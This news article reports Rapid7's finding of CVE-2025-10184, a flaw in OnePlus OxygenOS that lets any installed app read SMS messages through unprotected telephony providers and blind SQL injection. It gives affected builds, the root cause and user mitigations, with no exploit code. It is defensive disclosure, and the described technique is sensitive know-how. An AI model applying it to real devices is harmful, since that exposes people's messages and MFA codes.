OnePlus OxygenOS Flaw Lets Any App Steal SMS Data Without Permission

A critical permission bypass in OnePlus’s OxygenOS enables any installed application to silently access and exfiltrate users’ SMS and MMS messages, undermining the security of SMS-based multi-factor authentication (MFA) and threatening sensitive data confidentiality.

Rapid7 researchers discovered that a core Android content provider in multiple OxygenOS 12 and 15 builds exposes unprotected read and write operations, allowing unprivileged apps to query and manipulate telephony data without user consent.

OnePlus has acknowledged the issue and is investigating a fix.

Widespread Devices and Builds Impacted

Rapid7 confirmed the vulnerability, tracked as CVE-2025-10184, on OnePlus 8T (KB2003, OxygenOS 12), and several OnePlus 10 Pro 5G builds running OxygenOS 14 and 15.

Although OxygenOS 11 builds tested were not vulnerable, the flaw’s introduction in OxygenOS 12 suggests that any OnePlus device upgraded to affected versions is at risk.

Because it affects a system-provided Telephony content provider (com.android.providers.telephony) rather than hardware-specific code, the vulnerability likely extends to all devices running these software versions, exposing SMS metadata and message bodies to unauthorized extraction.

Rapid7 was unable to coordinate disclosure with OnePlus before publication due to restrictive bug bounty NDA terms, but OnePlus reached out on September 24, 2025, to confirm they are investigating Rapid7’s findings.

Technical Root Cause and Exploitation

Android content providers mediate access to structured data such as SMS messages via URIs and enforce permissions declared in an app’s AndroidManifest.xml.

On affected OxygenOS builds, three additional Telephony providers, PushMessageProvider, PushShopProvider, and ServiceNumberProvider,are exported without enforcing write permissions.

The ServiceNumberProvider’s update method passes unsanitized “where” clauses directly into SQLiteDatabase.update(), enabling SQL injection.

By abusing the update response count and unique constraint errors, an attacker can perform blind SQL injection to infer database contents one character at a time.

Rapid7 demonstrated how a proof-of-concept app, requiring no permissions, can retrieve recent SMS bodies—including MFA codes—from the user’s device.

With no vendor patch currently available, OnePlus users can limit exposure by restricting app installations to trusted sources and removing unneeded third-party apps.

To safeguard account security, users are advised to migrate critical services from SMS-based MFA to authenticator apps or hardware tokens.

Employing end-to-end encrypted messaging platforms instead of SMS for sensitive communications further reduces data leakage risk.

Additionally, switching service notifications to in-app push messages where possible will prevent SMS interception. Users should monitor OnePlus security updates and install vendor patches promptly once released.

This disclosure underscores the dangers of OEM modifications to core Android framework components and highlights the importance of rigorous permission enforcement in system content providers.

As state-sponsored adversaries increasingly target surveillance opportunities, such vulnerabilities threaten individual privacy and national security alike.

Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates

The post OnePlus OxygenOS Flaw Lets Any App Steal SMS Data Without Permission appeared first on Cyber Security News.